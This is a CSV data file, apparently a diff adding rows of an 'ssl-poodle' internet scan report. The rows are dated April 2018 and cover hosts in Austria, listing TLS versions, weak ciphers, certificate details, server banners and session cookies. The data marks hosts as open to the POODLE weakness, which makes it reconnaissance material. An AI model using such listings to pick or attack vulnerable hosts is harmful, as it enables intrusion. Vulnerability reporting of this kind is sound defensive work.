Technology,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache,0,,"Thu, 19 Apr 2018 13:32:20 GMT",Y,N,N,Y,OV,,,,,,,,,,,,
+2018-04-19 13:32:37,198.51.100.58,443,198-51-100-58.example.net,ssl-poodle,TLSv1.2,12605,AT,OBEROSTERREICH,LINZ,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,example,some_issuer,2015-01-17 16:11:24,2020-01-17 16:11:24,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,6D9E2D4443F1D69E4A8865CC1C5B6963,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/8.5,701,,"Thu, 19 Apr 2018 13:34:53 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:38,198.51.100.18,443,198-51-100-18.example.net,ssl-poodle,TLSv1.2,6830,AT,OBEROSTERREICH,LINZ,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,Y,2048,198-51-100-18.example.net,TERENA SSL CA 3,2017-07-14 00:00:00,2020-07-22 12:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0386AD387BEC13878473D23C8C786ECE,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,,Linz,,,,,,,,TERENA,,NL,Noord-Holland,Amsterdam,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,,Close,,BNIS_ChallengeState=Bqyd+IQebjQwiiYNKBJkA5Ta0spL1gX5; Path=/; Exp,,61,,,Y,N,N,Y,OV,,,,,,,,,,,,
+2018-04-19 13:32:38,198.51.100.246,443,,ssl-poodle,TLSv1.2,8447,AT,SALZBURG,SALZBURG,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,example,some_issuer,2014-09-01 16:18:46,2054-08-24 16:18:46,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,129FA64A4BE039B54E850F1AA65AD835,2,sha256WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html; charset=utf-8,,,ASP.NET_SessionId=e3qfk1dfz2mtqwzoym3gul3r; path=/; HttpOnly,Microsoft-IIS/8.5,145,,"Thu, 19 Apr 2018 13:32:40 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:39,198.51.100.35,443,198-51-100-35.example.net,ssl-poodle,TLSv1.0,12605,AT,OBEROSTERREICH,LINZ,TLS_RSA_WITH_AES_128_CBC_SHA,Y,2048,198-51-100-35.example.net,Go Daddy Secure Certificate Authority - G2,2017-08-28 13:29:01,2018-09-10 06:28:49,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,90B22B4CEF57C0FC,2,sha256WithRSAEncryption,rsaEncryption,,some_org_name,,,,,,,,198-51-100-35.example.net,,,,,US,Arizona,Scottsdale,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,266,,"Thu, 19 Apr 2018 13:35:03 GMT",Y,N,N,Y,DV,,,,,,,,,,,,
+2018-04-19 13:32:39,198.51.100.142,443,,ssl-poodle,TLSv1.0,8447,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,Y,2048,198.51.100.19,198-51-100-19.example.net,2014-12-11 09:57:33,2024-12-08 09:57:33,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,A0571DCBE5E1A2C062D8FB7001271581B5F69824157E385563FA23527E0B,2,sha256WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,DE,,,,,,,198-51-100-19.example.net,,,some_org_name,Engineering,DE,NRW,Wuerselen,,,,,198-51-100-19.example.net,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,Close,,,LANCOM,,,"Thur, 19 Apr 2018 13:32:41 GMT",Y,N,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:39,198.51.100.178,443,,ssl-poodle,TLSv1.0,8447,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2012-05-30 00:00:44,2032-05-25 00:00:44,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,4FC5632C,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,,chunked,"Thu, 19 Apr 2018 13:32:41 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:40,198.51.100.99,443,198-51-100-99.example.net,ssl-poodle,TLSv1.2,6830,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-99.example.net,RapidSSL RSA CA 2018,2018-03-30 00:00:00,2019-04-29 12:00:00,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0BDCB5D6D4C22BD2A1CF55584B6DE09C,2,sha256WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,DigiCert Inc,198-51-100-99.example.net,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,404,Not Found,text/html; charset=us-ascii,close,,,Microsoft-HTTPAPI/2.0,315,,"Thu, 19 Apr 2018 13:32:43 GMT",Y,N,N,Y,DV,,,,,,,,,,,,
+2018-04-19 13:32:40,198.51.100.235,443,198-51-100-235.example.net,ssl-poodle,TLSv1.0,25255,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,Y,1024,Nextcloud,Nextcloud,2016-12-13 20:28:39,2017-01-12 20:28:39,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,CDE5769D28C80B6B,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,,AU,Some-State,,,,,,,,,Internet Widgits Pty Ltd,,AU,Some-State,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,400,Bad Request,text/html; charset=UTF-8,close,,nc_sameSiteCookiestrict=true; path=/; httponly;secure; expires=Fr,Apache/2.4.10 (FreeBSD) OpenSSL/0.9.8zd-freebsd PH,6939,,"Thu, 19 Apr 2018 13:32:42 GMT",Y,Y,Y,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:41,198.51.100.187,443,198-51-100-187.example.net,ssl-poodle,TLSv1.2,28760,AT,OBEROSTERREICH,,TLS_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-187.example.net,Go Daddy Secure Certificate Authority - G2,2018-02-12 17:56:01,2020-02-12 17:56:01,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,03BA30FF4972177C,2,sha256WithRSAEncryption,rsaEncryption,,some_org_name,,,,,,,,198-51-100-187.example.net,,,,,US,Arizona,Scottsdale,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,400,No parameters passed t,text/html,,,,Microsoft-IIS/10.0,11,,"Thu, 19 Apr 2018 13:32:42 GMT",Y,N,N,Y,DV,,,,,,,,,,,,
+2018-04-19 13:32:42,198.51.100.213,443,198-51-100-213.example.net,ssl-poodle,TLSv1.2,8447,AT,OBEROSTERREICH,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-213.example.net,some_issuer,2016-09-22 08:12:17,2018-09-22 08:12:17,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,770000000EBB9429663601BAB700000000000E,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,AT,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,301,Moved Permanently,,close,,,Microsoft-IIS/8.5,0,,"Thu, 19 Apr 2018 13:32:44 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-19 13:32:42,198.51.100.74,443,198-51-100-74.example.net,ssl-poodle,TLSv1.0,62363,AT,STEIERMARK,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,DC,DC,2016-12-30 17:15:38,2021-12-30 17:15:38,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,7753CCEB55990A834E15DAC5707D403A,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,689,,"Thu, 19 Apr 2018 13:32:44 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:43,198.51.100.145,443,198-51-100-145.example.net,ssl-poodle,TLSv1.0,8447,AT,KARNTEN,KLAGENFURT AM WORTHERSEE,TLS_RSA_WITH_RC4_128_SHA,Y,1024,localdomain,localdomain,2008-10-07 20:12:54,2018-10-07 20:12:54,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,91B04FFCF174CCFF,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,,CA,,,,,,,198-51-100-145.example.net,,,some_org_name,,CA,Quebec,Gatineau,,,,,198-51-100-145.example.net,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,302,Found,text/html; charset=UTF-8,close,,"HOMEBASEID=658512b32961b9b6f8df7a3d4de7fa01; expires=Tue, 19-Jan-",Apache/2.2.3 (Red Hat),0,,"Thu, 19 Apr 2018 12:52:32 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:44,198.51.100.48,443,198-51-100-48.example.net,ssl-poodle,TLSv1.0,1901,AT,NIEDEROSTERREICH,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,198-51-100-48.example.net,198-51-100-48.example.net,2013-06-15 20:10:49,2023-06-15 20:10:49,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,013F49762DAE,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,US,,,,,,,198-51-100-48.example.net,,,Western Digital,Branded Products,US,CS,Mountain View,,,,,,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache,225,,"Thu, 19 Apr 2018 03:08:06 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-19 13:32:45,198.51.100.94,443,198-51-100-94.example.net,ssl-poodle,TLSv1.2,6830,AT,WIEN,VIENNA,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-94.example.net,RapidSSL CA,2013-04-03 17:02:33,2014-04-07 03:32:33,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,0B697D,2,sha1WithRSAEncryption,rsaEncryption,,some_org_name,,,,,,,,,,KtAjvog6HgAsml0cyxE4hpc9kv8dhgWZ,"GeoTrust, Inc.",,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,302,Found,text/html; charset=utf-8,,,ASP.NET_SessionId=z5lph4ufefkvg1xzmd4q2m33; path=/; HttpOnly,Microsoft-IIS/8.0,144,,"Thu, 19 Apr 2018 13:32:48 GMT",Y,N,Y,N,unknown,x509: certificate has expired or is not yet valid,,,,,,,,,,,
+2018-04-19 13:32:45,198.51.100.53,443,198-51-100-53.example.net,ssl-poodle,TLSv1.0,8447,AT,TIROL,,TLS_RSA_WITH_RC4_128_SHA,Y,1024,example,some_issuer,2008-11-13 13:47:18,2028-11-08 13:47:18,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,BE2B43544C0AFF2E,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,DE,,,,,,,198-51-100-53.example.net,,,some_org_name,some_org_name,DE,Niedersachsen,38162 Cremlingen (OT Schandelah),,,,,198-51-100-53.example.net,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html; charset=iso-8859-1;,,,,GoAhead-Webs,,,,Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:46,198.51.100.56,443,198-51-100-56.example.net,ssl-poodle,TLSv1.0,8445,AT,TIROL,,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,Y,2048,198-51-100-56.example.net,some_issuer,2016-11-28 08:05:12,2018-11-28 08:05:12,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,637D34F100010000000E,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Microsoft-IIS/7.5,689,,"Thu, 19 Apr 2018 13:32:49 GMT",N,N,N,N,unknown,x509: certificate signed by unknown authority,,,,,,,,,,,
+2018-04-19 13:32:46,198.51.100.82,443,198-51-100-82.example.net,ssl-poodle,TLSv1.0,6830,AT,OBEROSTERREICH,,TLS_RSA_WITH_AES_128_CBC_SHA,Y,1024,123AFG,7426AC8186F3,2011-01-01 00:00:06,2020-12-29 00:00:06,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,8186F3,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,some_org_name,US,,,,,,,,,,"Cisco Systems, Inc.",some_org_name,US,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,200,OK,text/html,close,,,Embedded HTTP Server.,107,,"Sat, 01 Jan 2011 00:00:45 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:48,198.51.100.29,443,198-51-100-29.example.net,ssl-poodle,TLSv1.0,6830,AT,STEIERMARK,GRAZ,TLS_RSA_WITH_RC4_128_SHA,Y,1024,198.51.100.43,198.51.100.22,2018-04-18 13:32:09,2038-01-15 13:32:09,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,862D98F4B99D0042,2,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.0,200,OK,text/html; charset=utf-8,,,,,,,,Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:49,198.51.100.114,443,198-51-100-114.example.net,ssl-poodle,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_AES_256_CBC_SHA,Y,1024,198-51-100-114.example.net,198-51-100-114.example.net,2009-08-25 17:47:57,2019-05-25 17:47:57,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,FB09C7848A7F4D77,0,sha1WithRSAEncryption,rsaEncryption,some_org_name,,AT,Vienna,Vienna,,,,,198-51-100-114.example.net,,,Digispectrum,,AT,Vienna,Vienna,,,,,198-51-100-114.example.net,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html; charset=utf-8,close,,b69223925949d45306d32f1a3d23c011=6a01vehilfpml41pl3pq3oth52; path,Apache/2.2.3 (CentOS),,chunked,"Thu, 19 Apr 2018 13:32:52 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:49,198.51.100.11,443,198-51-100-11.example.net,ssl-poodle,TLSv1.0,6830,AT,WIEN,VIENNA,TLS_RSA_WITH_RC4_128_SHA,Y,2048,FGT60C3G12019794,FGT60C3G12019794,2012-08-10 07:17:11,2022-08-11 07:17:11,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,-6CD83A89,2,sha1WithRSAEncryption,rsaEncryption,some_org_name,,,,,,,,,,,,Fortinet Ltd.,,,,,,,,,,,,0,0,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,,79,,"Thu, 19 Apr 2018 13:32:08 GMT",N,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
+2018-04-19 13:32:49,198.51.100.49,443,198-51-100-49.example.net,ssl-poodle,TLSv1.2,8447,AT,NIEDEROSTERREICH,,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,Y,1024,localhost,localhost,2009-11-10 23:48:47,2019-11-08 23:48:47,14:09:8C:6E:64:5F:50:C9:E9:A3:62:5E:02:BB:33:67:E1:05:D3:D2,B5C752C98781B503,0,sha1WithRSAEncryption,rsaEncryption,,,,,,,,,,,,,,,,,,,,,,,,,518210,737415,,57:7A:FC:7C:A1:0F:79:11:67:E0:31:AC:66:F5:84:22:28:4E:AC:9D:27:A6:3E:93:84:D9:65:8C:FC:21:BF:A1,E9:AE:EE:6C:D1:D1:9C:08:A5:8E:00:07:40:39:60:A0:CF:6D:A0:14:F0:A4:4C:47:28:9D:43:2E:A5:F6:45:66:3A:6F:5A:A4:CC:20:9A:FC:93:88:9B:BD:0B:EF:79:AF:EA:17:0A:08:6A:8A:98:9C:16:EC:94:1E:E7:C4:C7:87,1C:96:78:29:AA:E2:2E:11:AC:61:E5:AA:56:E1:91:BE,HTTP/1.1,200,OK,text/html,,,,Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.5.15,2190,,"Thu, 19 Apr 2018 13:32:55 GMT",Y,Y,N,N,unknown,x509: unknown error,,,,,,,,,,,
